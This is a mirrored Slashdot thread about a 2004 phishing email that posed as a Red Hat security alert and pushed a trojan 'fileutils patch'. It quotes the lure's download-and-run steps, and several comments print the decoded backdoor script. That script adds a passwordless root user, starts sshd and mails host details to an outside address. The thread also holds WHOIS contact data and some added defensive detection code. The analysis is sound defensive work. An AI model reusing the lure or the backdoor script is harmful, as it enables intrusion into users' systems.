Slashdot Mirror


Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

18 of 628 comments

  1. text of site by Anonymous Coward · · Score: 5, Informative

    Original issue date: October 20, 2004
    Last revised: October 20, 2004
    Source: RedHat

    A complete revision history is at the end of this file.

    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

    The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

    * First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
    * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
    * cd fileutils-1.0.6.patch
    * make
    * ./inst

    Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

    Thank you for your prompt attention to this serious matter,

    RedHat Security Team.

    Copyright © 2004 Red Hat, Inc. All rights reserved.

    1. Re:text of site by Seehund · · Score: 5, Informative
      Actually, the exploit indeed seems to use RPM. The archive includes a .bin file, which in reality is an RPM.
      drwxr-xr-x root/wheel 0 2004-10-23 21:09:09 fileutils-1.0.6.patch/
      -rw-r--r-- root/wheel 32 2004-10-23 02:59:42 fileutils-1.0.6.patch/Makefile
      -rw-r--r-- root/wheel 14297 2004-10-23 18:02:12 fileutils-1.0.6.patch/inst.c
      -rw-r--r-- root/wheel 990084 2004-10-23 21:06:48 fileutils-1.0.6.patch/fileutils-patch.bin
      But I see what you mean.

      Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

      I doubt that many fell for this.

      --
      Help saving AmigaOS and a free PowerPC market
    2. Re:text of site by WindBourne · · Score: 5, Informative
      It is a little root kit.
      /bin/chgrp
      /bin/chmod
      /bin/chown
      /bin/cp
      /bin/dd
      /bin/df
      /bin/link
      /bin/ln
      /bin/ls
      /bin/mkdir
      /bin/mknod
      /bin/mv
      /bin/rm
      /bin/rmdir
      /bin/sync
      /bin/touch
      /bin/unlink
      /etc/DIR_COLORS
      /etc/DIR_COLORS.xterm
      /etc/profile.d
      /etc/profile.d/colorls.csh
      /etc/profile.d/colorls.sh
      /usr/bin/dir
      /usr/bin/dircolors
      /usr/bin/du
      /usr/bin/install
      /usr/bin/mkfifo
      /usr/bin/shred
      /usr/bin/vdir
      ...
      And there is more, but hey....
      --
      I prefer the "u" in honour as it seems to be missing these days.
  2. Here's what WHOIS says: by SIGBUS · · Score: 5, Informative

    [Querying whois.internic.net]
    [Redirected to whois.melbourneit.com]
    [Querying whois.melbourneit.com]
    [whois.melbourneit.com]

    Domain Name.......... fedora-redhat.com
    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533
    Admin Fax............

    Tech Name............ YahooDomains TechContact
    Tech Address......... 701 First Ave.
    Tech Address.........
    Tech Address......... Sunnyvale
    Tech Address......... 94089
    Tech Address......... CA
    Tech Address......... UNITED STATES
    Tech Email........... domain.tech@YAHOO-INC.COM
    Tech Phone........... +1.6198813096
    Tech Fax............. +1.6198813010
    Name Server.......... yns1.yahoo.com
    Name Server.......... yns2.yahoo.com

    --
    Oh, no! You have walked into the slavering fangs of a lurking grue!
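Two of the clues in the WHOIS output above are mechanical enough to script for mail triage: the domain was created the same day the mail was circulating, and its name borrows brand words from domains it does not belong to. The following is an added example, not code from this thread or from any registrar tool. The WHOIS excerpt is constructed in the dotted key/value layout the post shows (only the domain name and creation date are taken from the post); the legitimate-domain and brand-word lists are assumptions for the demo, and the registrable-domain heuristic is deliberately crude (no public-suffix list).

```python
"""Phishing-domain triage: registration age plus brand-lookalike check.

Added example, not from the Slashdot post. CONSTRUCTED_WHOIS is a
constructed excerpt in the same 'Key.......... value' layout as the
posted whois output; LEGITIMATE and BRAND_WORDS are assumptions.
"""
from datetime import date
from typing import Dict, Optional

CONSTRUCTED_WHOIS = """\
Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Admin Fax............
"""

# Assumed list of domains that really belong to the brands; any other
# registrable domain containing a brand word is treated as a lookalike.
LEGITIMATE = {"redhat.com", "fedora.redhat.com"}
BRAND_WORDS = {"redhat", "fedora"}


def parse_dotted_whois(text: str) -> Dict[str, str]:
    """Parse 'Key.......... value' lines; keep the first value for a repeated key."""
    out: Dict[str, str] = {}
    for line in text.splitlines():
        if "." not in line:
            continue
        key, _, rest = line.partition(".")
        key = key.strip()
        value = rest.lstrip(".").strip()      # drop the dot leader, keep the value
        if key and value and key not in out:
            out[key] = value
    return out


def domain_age_days(whois_text: str, seen_on: date) -> Optional[int]:
    """Days between the WHOIS creation date and the day the mail was seen."""
    created = parse_dotted_whois(whois_text).get("Creation Date")
    if not created:
        return None
    return (seen_on - date.fromisoformat(created)).days


def registrable_domain(host: str) -> str:
    """Crude last-two-labels heuristic: a.b.example.com -> example.com."""
    parts = host.lower().strip(".").split(".")
    return ".".join(parts[-2:])


def is_brand_lookalike(host: str, legitimate=LEGITIMATE, brands=BRAND_WORDS) -> bool:
    """True when the host borrows a brand word but is not one of the brand's domains."""
    host = host.lower().strip(".")
    if host in legitimate or any(host.endswith("." + d) for d in legitimate):
        return False
    return any(b in registrable_domain(host) for b in brands)


def triage(host: str, whois_text: str, seen_on: date, max_age_days: int = 30) -> Dict[str, object]:
    """Combine both signals into one verdict dictionary."""
    age = domain_age_days(whois_text, seen_on)
    return {
        "domain": host,
        "age_days": age,
        "newly_registered": age is not None and age <= max_age_days,
        "brand_lookalike": is_brand_lookalike(host),
    }


if __name__ == "__main__":
    # The mail in the story circulated on 2004-10-24; the WHOIS says the
    # domain was created that same day.
    print(triage("www.fedora-redhat.com", CONSTRUCTED_WHOIS, date(2004, 10, 24)))
```

Neither signal is proof on its own (brand-new domains and hyphenated brand names both have legitimate uses), but a link domain that is both days old and a lookalike of the sender it claims to be is the combination a mail gateway or an analyst should escalate.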
  3. Re:I'll try it... by damiam · · Score: 5, Informative

    Make sure you use a chroot jail; Knoppix can still write to your hard drive.

    --
    It's hard to be religious when certain people are never incinerated by bolts of lightning.
  4. Re:I'll try it... by busonerd · · Score: 4, Informative

    [apologies for replying to myself]

    The makefile compiles an application called inst that seems to have been created with the shc script compiler. It's rather obfuscated. Attempting to reverse engineer now.

  5. Re: I'll try it... Execution results! by enginuitor · · Score: 5, Informative

    Identifying the system. This may take up to 2 minutes. Please wait...
    adduser: No more than two names.
    passwd: Unknown user bash
    Could not load host key: /etc/ssh/ssh_host_key
    Could not load host key: /etc/ssh/ssh_host_rsa_key
    Could not load host key: /etc/ssh/ssh_host_dsa_key
    Disabling protocol version 1. Could not load host key.
    Disabling protocol version 2. Could not load host key.
    sshd: no hostkeys available -- exiting.
    System looks OK. Proceeding to next step.

    Patching "ls": ###########
    Patching "mkdir": ##########

    System updated and secured successfully. You may erase these files.

  6. Re:I'll try it... by eakerin · · Score: 4, Informative
    Well I downloaded it, and uncompressed it.

    There are 3 files:
    fileutils-patch.bin
    inst.c
    Makefile

    fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from redhat (verified the GPG signature). Probably just put there to make it look bigger, and have something that came from redhat.

    Well I was gonna put the package header information here, but slashcode didn't like it.

    Signature verification using "rpm --checksig fileutils-patch.bin"
    fileutils-patch.bin: (sha1) dsa sha1 md5 gpg OK
  7. Use SPF to protect yourself from phishing by taubz · · Score: 5, Informative

    If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.

    How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension.

    (Disclosure: I wrote the plugin. :) )
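To make the SPF point concrete, here is an added example (not the commenter's plugin, and not Red Hat's real record) of the core evaluation a client-side check performs: match the connecting IP against the domain's published `v=spf1` policy. The record and the IP addresses are constructed from documentation ranges; mechanisms that need DNS (`include`, `a`, `mx`, `ptr`, `exists`) are reported as unresolved so the code runs offline.

```python
"""Minimal SPF (RFC 7208) evaluator for ip4 / ip6 / all mechanisms.

Added example, not code from the post or from the Thunderbird SPF
extension it links to. CONSTRUCTED_RECORDS are made-up policies for
demo domains, not anyone's real DNS data.
"""
import ipaddress

# Constructed policies: the first domain sends only from 192.0.2.0/24 and
# 2001:db8::/32 and hard-fails everything else; the second soft-fails.
CONSTRUCTED_RECORDS = {
    "example-brand.com": "v=spf1 ip4:192.0.2.0/24 ip6:2001:db8::/32 -all",
    "softfail-brand.com": "v=spf1 ip4:198.51.100.10 ~all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def evaluate_spf(record: str, client_ip: str) -> str:
    """Return pass/fail/softfail/neutral/none/permerror, or 'unresolved'
    (this demo's label) for mechanisms that would need a DNS lookup."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"                      # not an SPF record at all
    ip = ipaddress.ip_address(client_ip)
    for term in terms[1:]:
        qualifier = "+"                    # RFC 7208: default qualifier is '+'
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            return QUALIFIERS[qualifier]   # 'all' always matches
        if name in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"         # malformed network in the record
            if ip.version == net.version and ip in net:
                return QUALIFIERS[qualifier]
            continue
        if "=" in term:
            continue                       # modifiers (redirect=, exp=) ignored here
        return "unresolved"                # include/a/mx/ptr/exists need DNS
    return "neutral"                       # nothing matched and no 'all' term


def check_sender(sender_addr: str, client_ip: str, records=CONSTRUCTED_RECORDS) -> str:
    """Look up the sender domain's policy in the constructed table and evaluate it."""
    domain = sender_addr.rsplit("@", 1)[-1].lower()
    record = records.get(domain)
    if record is None:
        return "none"                      # domain publishes no SPF record
    return evaluate_spf(record, client_ip)


if __name__ == "__main__":
    # A mail claiming to be from example-brand.com but delivered from an
    # address outside the published ranges: hard fail.
    print(check_sender("security@example-brand.com", "203.0.113.5"))
```

One caveat worth keeping in mind when reading the comment above: SPF formally authorizes the envelope sender (MAIL FROM) and HELO identity, not the header From: that a mail client displays; a client-side check that compares the header From: domain against the connecting IP is an approximation, which is one of the gaps that later DMARC alignment was designed to close.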

  8. Re: I'll try it... Execution results! by enginuitor · · Score: 5, Informative

    It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.

  9. Re:I'll try it... by superpeach · · Score: 5, Informative

    I just looked at inst.c and changed it a bit to print what it runs instead of running it. Looks like a shell script hidden in some C (using shc, http://www.datsi.fi.upm.es/~frosal/sources/shc.html)

    The working bit of the script is:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.

  10. Contents of inst.c... by enginuitor · · Score: 5, Informative

    I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
    View inst.c

  11. Re: I'll try it... Execution results! by Smitedogg · · Score: 5, Informative

    Here is what it does.

    Dogg

  12. I'm retarded by Cid+Highwind · · Score: 4, Informative

    Looks like I misinterpreted the code. The rc4 stuff is part of the shc "script compiler" output that decodes the actual shell script. fileutils-patch.bin is just a mis-named redhat RPM that inst doesn't appear to use at all.

    --
    0 1 - just my two bits
    1. Re:I'm retarded by busonerd · · Score: 5, Informative

      Preliminary analysis of inst.c: Decrypts a whole bunch of stuff (not sure where it all goes yet) and then splits off to /bin/sh with a command line of: /bin/sh -c exec './inst' "$@" ./inst

  13. Re: I'll try it... Execution results! by MbM · · Score: 5, Informative

    The script is encoded into the text variable in the source. The key part of the script is this:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    (I'd post the whole script but the lameness filter won't let me)

    Create a user named bash, no password
    grab the ip and uptime, start ssh
    mail the results

    --
    - MbM
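The two decodings of the script (comments 9 and 13 above) agree on what a compromised host ends up with: a second UID 0 / GID 0 account named `bash` with an empty password. That leaves a clean host-side check, shown here as an added example that is not code from the thread. The passwd and shadow content is constructed to mimic a host after `adduser -g 0 -u 0 -o bash` and `passwd -d bash` have run; only the account name comes from the posted script, everything else is made up.

```python
"""Audit passwd/shadow for extra UID 0 accounts and empty password fields.

Added example, not from the Slashdot thread. CONSTRUCTED_PASSWD and
CONSTRUCTED_SHADOW are made-up files; on a real host you would pass the
contents of /etc/passwd and /etc/shadow (the latter needs root).
"""
from typing import Dict, List

CONSTRUCTED_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
bash:x:0:0::/home/bash:/bin/bash
"""

CONSTRUCTED_SHADOW = """\
root:$1$saltsalt$abcdefghijklmnopqrstu.:12714:0:99999:7:::
bin:*:12714:0:99999:7:::
daemon:*:12714:0:99999:7:::
alice:$1$saltsalt$vwxyz0123456789ABCDEFG:12714:0:99999:7:::
bash::12714:0:99999:7:::
"""


def parse_colon_file(text: str) -> List[List[str]]:
    """Split a passwd/shadow-style file into field lists, skipping blanks and comments."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        rows.append(line.split(":"))
    return rows


def find_extra_uid0(passwd_text: str) -> List[str]:
    """Names of every UID 0 account other than root (what 'adduser -u 0 -o' produces)."""
    extra = []
    for fields in parse_colon_file(passwd_text):
        if len(fields) < 7:
            continue                       # malformed line, not a passwd entry
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            extra.append(name)
    return extra


def find_empty_passwords(passwd_text: str, shadow_text: str) -> List[str]:
    """Names whose password field is empty in passwd or shadow (what 'passwd -d' produces)."""
    empty = set()
    for fields in parse_colon_file(passwd_text):
        if len(fields) >= 2 and fields[1] == "":
            empty.add(fields[0])
    for fields in parse_colon_file(shadow_text):
        if len(fields) >= 2 and fields[1] == "":
            empty.add(fields[0])
    return sorted(empty)


def audit_accounts(passwd_text: str, shadow_text: str) -> Dict[str, List[str]]:
    """Run both checks; an account that hits both is exactly the pattern from the script."""
    uid0 = find_extra_uid0(passwd_text)
    nopw = find_empty_passwords(passwd_text, shadow_text)
    return {
        "extra_uid0": uid0,
        "empty_password": nopw,
        "uid0_and_no_password": sorted(set(uid0) & set(nopw)),
    }


if __name__ == "__main__":
    for key, names in audit_accounts(CONSTRUCTED_PASSWD, CONSTRUCTED_SHADOW).items():
        print(f"{key}: {names}")
```

Beyond the account itself, the script's other side effects are also worth a look on a suspect host: an sshd that was started by hand rather than by the init system, and outbound mail to the address in the script. The `/tmp/mama` file is deleted by the script, so its absence proves nothing.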
  14. contact yahoo by Anonymous Coward · · Score: 4, Informative

    Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.

  15. Re:I'll try it... by aredubya74 · · Score: 4, Informative

    Assuming (yeah, I know, big assumption) the whois info is relatively accurate, we may have an idea as to at least the next step in the chain of figuring out the culprit, output of whois addlebrain.com:

    Registration Service Provided By: StoreIQ, Inc.
    Contact: technical@storeiq.com
    Visit:

    Domain name: addlebrain.com

    Registrant Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Administrative Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Technical Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Billing Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Status: Locked

    Name Servers:
    dns1.name-services.com
    dns2.name-services.com
    dns3.name-services.com
    dns4.name-services.com
    dns5.name-services.com

    The same address is used for two associated domains, buywirelessdirect.com (the email addy for this domain's tech contact) and storeiq.com (the email addy for buywirelessdirect.com's tech contact). The area code is accurate for that neck of the woods too, though I haven't tried the phone number (yet):

    StoreIQ, Inc.
    John Thompson (technical@storeiq.com)
    +1.7323331145
    Fax:
    3587 US Highway 9 #213
    Freehold, NJ 07728
    US

    --

    RW